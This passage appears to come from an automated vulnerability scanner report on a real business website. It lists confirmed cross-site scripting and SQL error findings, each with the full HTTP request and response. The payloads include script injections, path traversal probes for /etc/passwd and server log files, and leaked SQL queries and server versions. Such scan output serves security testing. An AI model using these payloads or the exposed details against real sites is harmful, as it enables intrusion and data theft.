P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=da5e964dmei3hh34nohv048eg4; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>' OR prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>' OR prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>' OR prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>' OR prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>' OR prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00055F)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?'"--></style></script><script>alert(0x00056E..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x00056E)</script>

Request

GET /ppc/leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ngsj5vhoaeqathg7tf7gv6tco7; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00056E)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST '"--></style></script><script>alert(0x000572)</script>
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 327
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000572)%3c%2fscript%3e&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:58 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=DA2D9A18BCD9550A8B0BD487D620B406; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" 